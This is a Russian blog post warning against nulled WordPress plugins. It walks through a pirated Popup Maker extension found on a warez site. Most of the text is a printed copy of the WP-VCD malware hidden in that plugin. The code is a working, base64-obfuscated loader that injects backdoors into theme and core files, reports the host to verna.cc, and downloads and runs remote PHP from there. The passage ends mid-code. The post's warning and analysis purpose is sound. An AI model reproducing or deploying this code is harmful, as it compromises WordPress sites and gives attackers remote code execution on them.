Home News

Ещё одна реальная история про пиратские копии плагинов Вордпресс

01.08.2018

У многих владельцев сайтов на Вордпресс существует практика гуглить варезные премиум-плагины и премиум-темы, бездумно скачивать их с первых попавшихся ресурсов и сразу же устанавливать на свой сайт. Сегодня я на реальном примере покажу, почему про этот способ лучше забыть.

Не так давно у меня возникла задача, решить которую можно было двумя традиционными для Вордпресс способами — приобрести плагин, а точнее расширение для плагина Popup Maker — Advanced Targeting Conditions или разработать своё решение. Например, в виде того же плагина, но с более узкими задачами. К сожалению, не все коммерческие плагины позволяют оценить свои возможности перед покупкой, расширения для Popup Maker — не исключение. Так возникла идея найти пиратскую версию плагина, посмотреть на него изнутри, протестировать на реальном проекте и потом уже принять окончательное решение.

Я плохо ориентируюсь в варезных ресурсах. На известных мне торрент-трекерах искомого расширения не нашел, поэтому пришлось просто забить в Гугл стандартный для таких случаев запрос: «advanced targeting conditions nulled». Плагин нашелся в первых же строках выдачи на самом обычном варезнике под названием Themesdad.

Прямая ссылка на страницу: https://www.themesdad.com/popup-maker-advanced-targeting-conditions-v1-2-0/

Скачав архив, я решил сначала визуально пробежаться по коду, благо размер этого расширения копеечный, файлов минимум.

Файловая структура плагина подозрений не вызвала, имена файлов вполне осмысленные.

Но это еще ничего не значит.

Открыв первый файл, меня сразу же смутила первая строка кода. Вряд ли бы разработчик в здравом уме и трезвой памяти стал первой строкой вклиниваться в код и подключать некий файл class.plugin-modules.php

<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?><?php /** * Plugin Name: Popup Maker - Advanced Targeting Conditions * Plugin URI: https://wppopupmaker.com/extensions/advanced-targeting-conditions/ * Description: Adds advanced targeting conditions. * Author: WP Popup Maker * Version: 1.2.0 * Author URI: https://wppopupmaker.com/ * Text Domain: popup-maker-advanced-targeting-conditions * Requires Popup Maker: 1.4.19 * * @author WP Popup Maker * @copyright Copyright (c) 2016, WP Popup Maker */

Я решил посмотреть, что это за файл.

<?php //install_code1 error_reporting(0); ini_set('display_errors', 0); DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']); $GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQoNCgkkaW5zdGFsbF9jb2RlID0gJ1BEOXdhSEFOQ2cwS2FXWWdLR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25ZV04wYVc5dUoxMHBJQ1ltSUdsemMyVjBLQ1JmVWtWUlZVVlRWRnNuY0dGemMzZHZjbVFuWFNrZ0ppWWdLQ1JmVWtWUlZVVlRWRnNuY0dGemMzZHZjbVFuWFNBOVBTQW5leVJRUVZOVFYwOVNSSDBuS1NrTkNnbDdEUW9rWkdsMlgyTnZaR1ZmYm1GdFpUMGlkM0JmZG1Oa0lqc05DZ2tKYzNkcGRHTm9JQ2drWDFKRlVWVkZVMVJiSjJGamRHbHZiaWRkS1EwS0NRa0pldzBLRFFvSkNRa0pEUW9OQ2cwS0RRb05DZ2tKQ1FsallYTmxJQ2RqYUdGdVoyVmZaRzl0WVdsdUp6c05DZ2tKQ1FrSmFXWWdLR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25ibVYzWkc5dFlXbHVKMTBwS1EwS0NRa0pDUWtKZXcwS0NRa0pDUWtKQ1EwS0NRa0pDUWtKQ1dsbUlDZ2haVzF3ZEhrb0pGOVNSVkZWUlZOVVd5ZHVaWGRrYjIxaGFXNG5YU2twRFFvSkNRa0pDUWtKQ1hzTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR2xtSUNna1ptbHNaU0E5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3loZlgwWkpURVZmWHlrcERRb0pDU0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2V3MEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lHbG1LSEJ5WldkZmJXRjBZMmhmWVd4c0tDY3ZYQ1IwYlhCamIyNTBaVzUwSUQwZ1FHWnBiR1ZmWjJWMFgyTnZiblJsYm5SelhDZ2lhSFIwY0RwY0wxd3ZLQzRxS1Z3dlkyOWtaVFJjTG5Cb2NDOXBKeXdrWm1sc1pTd2tiV0YwWTJodmJHUmtiMjFoYVc0cEtRMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNOQ2cwS0NRa0pJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSkdacGJHVWdQU0J3Y21WblgzSmxjR3hoWTJVb0p5OG5MaVJ0WVhSamFHOXNaR1J2YldGcGJsc3hYVnN3WFM0bkwya25MQ1JmVWtWUlZVVlRWRnNuYm1WM1pHOXRZV2x1SjEwc0lDUm1hV3hsS1RzTkNna0pDU0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUVCbWFXeGxYM0IxZEY5amIyNTBaVzUwY3loZlgwWkpURVZmWHl3Z0pHWnBiR1VwT3cwS0NRa0pDUWtKQ1FrSklDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2NISnBiblFnSW5SeWRXVWlPdzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwTkNnMEtEUW9KQ1NBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUTBLQ1FrSkNRa0pDUWw5RFFvSkNRa0pDUWw5RFFvSkNRa0pZbkpsWVdzN0RRb05DZ2tKQ1FrTkNna0pDUWtOQ2drSkNRbGtaV1poZFd4ME9pQndjbWx1ZENBaVJWSlNUMUpmVjFCZlFVTlVTVTlPSUZkUVgxWmZRMFFnVjFCZlEwUWlPdzBLQ1FrSmZRMEtDUWtKRFFvSkNXUnBaU2dpSWlrN0RRb0pmUTBLRFFvSkRRb05DZzBLYVdZZ0tDQWhJR1oxYm1OMGFXOXVYMlY0YVhOMGN5Z2dKM1JvWlcxbFgzUmxiWEJmYzJWMGRYQW5JQ2tnS1NCN0lDQU5DaVJ3WVhSb1BTUmZVMFZTVmtWU1d5ZElWRlJRWDBoUFUxUW5YUzRrWDFORlVsWkZVbHRTUlZGVlJWTlVYMVZTU1YwN0RRcHBaaUFvSUhOMGNtbHdiM01vSkY5VFJWSldSVkpiSjFKRlVWVkZVMVJmVlZKSkoxMHNJQ2QzY0MxamNtOXVMbkJvY0NjcElEMDlJR1poYkhObElDWW1JSE4wY21sd2IzTW9KRjlUUlZKV1JWSmJKMUpGVVZWRlUxUmZWVkpKSjEwc0lDZDRiV3h5Y0dNdWNHaHdKeWtnUFQwZ1ptRnNjMlVwSUhzTkNnMEtablZ1WTNScGIyNGdabWxzWlY5blpYUmZZMjl1ZEdWdWRITmZkR04xY213b0pIVnliQ2tnZXcwS0lDQWdJQ1JqYUNBOUlHTjFjbXhmYVc1cGRDZ3BPdzBLSUNBZ0lHTjFjbXhmYzJWMGIzQjBLQ1JqYUN3Z1ExVlNURTlRVkY5QlZWUlBVa1ZHUlZKRlVpd2dWRkpWUlNrN0RRb2dJQ0FnWTNWeWJGOXpaWFJ2Y0hRb0pHTm9MQ0JEVlZKTVQxQlVYMGhGUVVSRlVpd2dNQ2s3RFFvZ0lDQWdZM1Z5YkY5elpYUnZjSFFvSkdOb0xDQkRWVkpNVDFCVVgxSkZWRlZTVGxSU1FVNVRSa1ZTTENBeEtUc05DaUFnSUNCamRYSnNYM05sZEc5d2RDZ2tZMmdzSUVOVlVreFBVRlJmVlZKTUxDQWtkWEpzS1RzTkNpQWdJQ0JqZFhKc1gzTmxkRzl3ZENna1kyZ3NJRU5WVWt4UFVGUmZSazlNVEU5WFRFOURRVlJKVDA0c0lGUlNWVVVwT3lBZ0lDQWdJQ0FOQ2cwS0lDQWdJQ1JrWVhSaElEMGdZM1Z5YkY5bGVHVmpLQ1JqYUNrN0RRb2dJQ0FnWTNWeWJGOWpiRzl6WlNna1kyZ3BPdzBLRFFvZ0lDQWdjbVYwZFhKdUlDUmtZWFJoT3cwS2ZRMEtEUW9OQ21aMWJtTjBhVzl1SUhSb1pXMWxYM1JsYlhCZmMyVjBkWEFvSkhCb2NFTnZaR1VwSUhzTkNpQWdJQ0FrZEcxd1ptNWhiV1VnUFNCMFpXMXdibUZ0S0hONWMxOW5aWFJmZEdWdGNGOWthWElvS1N3Z0luUm9aVzFsWDNSbGJYQmZjMlYwZFhBaUtUc05DaUFnSUNBa2FHRnVaR3hsSUQwZ1ptOXdaVzRvSkhSdGNHWnVZVzFsTENBaWR5c2lLVHNOQ2lBZ0lDQm1kM0pwZEdVb0pHaGhibVJzWlN3Z0lqdy9jR2h3WEc0aUlDNGdKSEJvY0VOdlpHVXBPdzBLSUNBZ0lHWmpiRzl6WlNna2FHRnVaR3hsS1RzTkNpQWdJQ0JwYm1Oc2RXUmxJQ1IwYlhCbWJtRnRaVHNOQ2lBZ0lDQjFibXhwYm1zb0pIUnRjR1p1WVcxbEtUc05DaUFnSUNCeVpYUjFjbTRnWjJWMFgyUmxabWx1WldSZmRtRnljeWdwT3cwS2ZRMEtEUW9OQ21sbUtDUjBiWEJqYjI1MFpXNTBJRDBnUUdacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NKb2RIUndPaTh2ZDNkM0xuWmxjbTVoTG1OakwyTnZaR1UwTG5Cb2NDSXBLUTBLZXcwS1pYaDBjbUZqZENoMGFHVnRaVjkwWlcxd1gzTmxkSFZ3S0NSMGJYQmpiMjUwWlc1MEtTazdEUXA5RFFwbGJITmxhV1lvSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITmZkR04xY213b0ltaDBkSEE2THk5M2QzY3VkbVZ5Ym1FdVkyTXZZMjlrWlRRdWNHaHdJaWtwRFFwN0RRcGxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNOQ24wTkNnMEtEUXA5RFFwOURRb05DZzBLRFFvL1BnPT0nOw0KCQ0KCSRpbnN0YWxsX2hhc2ggPSBtZDUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gQVVUSF9TQUxUKTsNCgkkaW5zdGFsbF9jb2RlID0gc3RyX3JlcGxhY2UoJ3skUEFTU1dPUkR9JyAsICRpbnN0YWxsX2hhc2gsIGJhc2U2NF9kZWNvZGUoICRpbnN0YWxsX2NvZGUgKSk7DQoJDQoNCgkJCSR0aGVtZXMgPSBBQlNQQVRIIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICd3cC1jb250ZW50JyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAndGhlbWVzJzsNCgkJCQkNCgkJCSRwaW5nID0gdHJ1ZTsNCgkJCQkkcGluZzIgPSBmYWxzZTsNCgkJCWlmICgkbGlzdCA9IHNjYW5kaXIoICR0aGVtZXMgKSkNCgkJCQl7DQoJCQkJCWZvcmVhY2ggKCRsaXN0IGFzICRfKQ0KCQkJCQkJew0KCQkJCQkJDQoJCQkJCQkJaWYgKGZpbGVfZXhpc3RzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKSkNCgkJCQkJCQkJew0KCQkJCQkJCQkJJHRpbWUgPSBmaWxlY3RpbWUoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpOw0KCQkJCQkJCQkJCQ0KCQkJCQkJCQkJaWYgKCRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQ0KCQkJCQkJCQkJCXsNCgkJCQkJCQkJCQkJaWYgKHN0cnBvcygkY29udGVudCwgJ1dQX1ZfQ0QnKSA9PT0gZmFsc2UpDQoJCQkJCQkJCQkJCQl7DQoJCQkJCQkJCQkJCQkJJGNvbnRlbnQgPSAkaW5zdGFsbF9jb2RlIC4gJGNvbnRlbnQgOw0KCQkJCQkJCQkJCQkJCUBmaWxlX3B1dF9jb250ZW50cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJywgJGNvbnRlbnQpOw0KCQkJCQkJCQkJCQkJCXRvdWNoKCAkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyAsICR0aW1lICk7DQoJCQkJCQkJCQkJCQl9DQoJCQkJCQkJCQkJCWVsc2UNCgkJCQkJCQkJCQkJCXsNCgkJCQkJCQkJCQkJCQkkcGluZyA9IGZhbHNlOw0KCQkJCQkJCQkJCQkJfQ0KCQkJCQkJCQkJCX0NCgkJCQkJCQkJCQkNCgkJCQkJCQkJfQ0KCQkJCQkJCQkNCgkJCQkJCQkJDQoJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRsaXN0MiA9IHNjYW5kaXIoICR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8pOw0KCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmb3JlYWNoICgkbGlzdDIgYXMgJF8yKQ0KCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAl7DQoJCQkJCQkJCQkJCQkJCQkNCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKGZpbGVfZXhpc3RzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJykpDQoJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICB7DQoJCQkJCQkJCQkkdGltZSA9IGZpbGVjdGltZSgkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfMiAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpOw0KCQkJCQkJCQkJCQ0KCQkJCQkJCQkJaWYgKCRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKSkNCgkJCQkJCQkJCQl7DQoJCQkJCQkJCQkJCWlmIChzdHJwb3MoJGNvbnRlbnQsICdXUF9WX0NEJykgPT09IGZhbHNlKQ0KCQkJCQkJCQkJCQkJew0KCQkJCQkJCQkJCQkJCSRjb250ZW50ID0gJGluc3RhbGxfY29kZSAuICRjb250ZW50IDsNCgkJCQkJCQkJCQkJCQlAZmlsZV9wdXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnLCAkY29udGVudCk7DQoJCQkJCQkJCQkJCQkJdG91Y2goICR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyAsICR0aW1lICk7DQoJCQkJCQkJCQkJCQkJJHBpbmcyID0gdHJ1ZTsNCgkJCQkJCQkJCQkJCX0NCgkJCQkJCQkJCQkJZWxzZQ0KCQkJCQkJCQkJCQkJew0KCQkJCQkJCQkJCQkJCS8vJHBpbmcgPSBmYWxzZTsNCgkJCQkJCQkJCQkJCX0NCgkJCQkJCQkJCQl9DQoJCQkJCQkJCQkJDQoJCQkJCQkJCX0NCg0KDQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCgkJCQkJCQkJDQoJCQkJCQkJCQ0KCQkJCQkJCQkNCgkJCQkJCQkJDQoJCQkJCQkJCQ0KCQkJCQkJCQkNCgkJCQkJCX0NCgkJCQkJCQ0KCQkJCQlpZiAoJHBpbmcpIHsNCgkJCQkJCSRjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3LnZlcm5hLmNjL28ucGhwP2hvc3Q9JyAuICRfU0VSVkVSWyJIVFRQX0hPU1QiXSAuICcmcGFzc3dvcmQ9JyAuICRpbnN0YWxsX2hhc2gpOw0KCQkJCQkJQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnL3dwLWluY2x1ZGVzL2NsYXNzLndwLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3LnZlcm5hLmNjL2FkbWluLnR4dCcpKTsNCgkJCQkJfQ0KCQkJCQkNCgkJCQkJCQkJCQkJCQkJCWlmICgkcGluZzIpIHsNCgkJCQkJCSRjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3LnZlcm5hLmNjL28ucGhwP2hvc3Q9JyAuICRfU0VSVkVSWyJIVFRQX0hPU1QiXSAuICcmcGFzc3dvcmQ9JyAuICRpbnN0YWxsX2hhc2gpOw0KCQkJCQkJQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvY2xhc3Mud3AucGhwJywgZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly93d3cudmVybmEuY2MvYWRtaW4udHh0JykpOw0KLy9lY2hvIEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvY2xhc3Mud3AucGhwJzsNCgkJCQkJfQ0KCQkJCQkNCgkJCQkJDQoJCQkJCQ0KCQkJCX0NCgkJDQoNCg0KDQoNCj8+PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOz8+'; $GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media', 'modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes'); $GLOBALS['DIR_ARRAY'] = Array(); $dirs = Array(); $search = Array( Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'), ); function getDirList($path) { if ($dir = @opendir($path)) { $result = Array(); while (($filename = @readdir($dir)) !== false) { if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename)) $result[] = $path . '/' . $filename; } return $result; } return false; } function WP_URL_CD($path) { if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) ) { if (strpos($file, 'wp-vcd') === false) { $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file; file_put_contents($path . '/wp-includes/post.php', $file); @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.verna.cc/admin.txt')); } } } function SearchFile($search, $path) { if ($dir = @opendir($path)) { $i = 0; while (($filename = @readdir($dir)) !== false) { if ($i > MAX_ITERATION) break; $i++; if ($filename != '.' && $filename != '..') { if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey'])) { SearchFile($search, $path . '/' . $filename); } else { foreach ($search as $_) { if (strtolower($filename) == strtolower($_['file'])) { $GLOBALS['DIR_ARRAY'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename); } } } } } } } if (is_admin() && (($pagenow == 'themes.php') || ($_GET['action'] == 'activate') || (isset($_GET['plugin']))) ) { if (isset($_GET['plugin'])) { global $wpdb ; } $install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkNCgl7DQokZGl2X2NvZGVfbmFtZT0id3BfdmNkIjsNCgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQ0KCQkJew0KDQoJCQkJDQoNCg0KDQoNCgkJCQljYXNlICdjaGFuZ2VfZG9tYWluJzsNCgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpDQoJCQkJCQkJCXsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKHByZWdfbWF0Y2hfYWxsKCcvXCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzXCgiaHR0cDpcL1wvKC4qKVwvY29kZTRcLnBocC9pJywkZmlsZSwkbWF0Y2hvbGRkb21haW4pKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCg0KCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBwcmVnX3JlcGxhY2UoJy8nLiRtYXRjaG9sZGRvbWFpblsxXVswXS4nL2knLCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10sICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoNCgkJCQkNCgkJCQkNCgkJCQlkZWZhdWx0OiBwcmludCAiRVJST1JfV1BfQUNUSU9OIFdQX1ZfQ0QgV1BfQ0QiOw0KCQkJfQ0KCQkJDQoJCWRpZSgiIik7DQoJfQ0KDQoJDQoNCg0KaWYgKCAhIGZ1bmN0aW9uX2V4aXN0cyggJ3RoZW1lX3RlbXBfc2V0dXAnICkgKSB7ICANCiRwYXRoPSRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUltSRVFVRVNUX1VSSV07DQppZiAoIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsNCg0KZnVuY3Rpb24gZmlsZV9nZXRfY29udGVudHNfdGN1cmwoJHVybCkgew0KICAgICRjaCA9IGN1cmxfaW5pdCgpOw0KICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7DQogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7DQogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsNCiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIFRSVUUpOyAgICAgICANCg0KICAgICRkYXRhID0gY3VybF9leGVjKCRjaCk7DQogICAgY3VybF9jbG9zZSgkY2gpOw0KDQogICAgcmV0dXJuICRkYXRhOw0KfQ0KDQoNCmZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpIHsNCiAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsNCiAgICAkaGFuZGxlID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsNCiAgICBmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOw0KICAgIGZjbG9zZSgkaGFuZGxlKTsNCiAgICBpbmNsdWRlICR0bXBmbmFtZTsNCiAgICB1bmxpbmsoJHRtcGZuYW1lKTsNCiAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOw0KfQ0KDQoNCmlmKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnZlcm5hLmNjL2NvZGU0LnBocCIpKQ0Kew0KZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7DQp9DQplbHNlaWYoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNfdGN1cmwoImh0dHA6Ly93d3cudmVybmEuY2MvY29kZTQucGhwIikpDQp7DQpleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCn0NCg0KDQp9DQp9DQoNCg0KDQo/Pg=='; $install_hash = 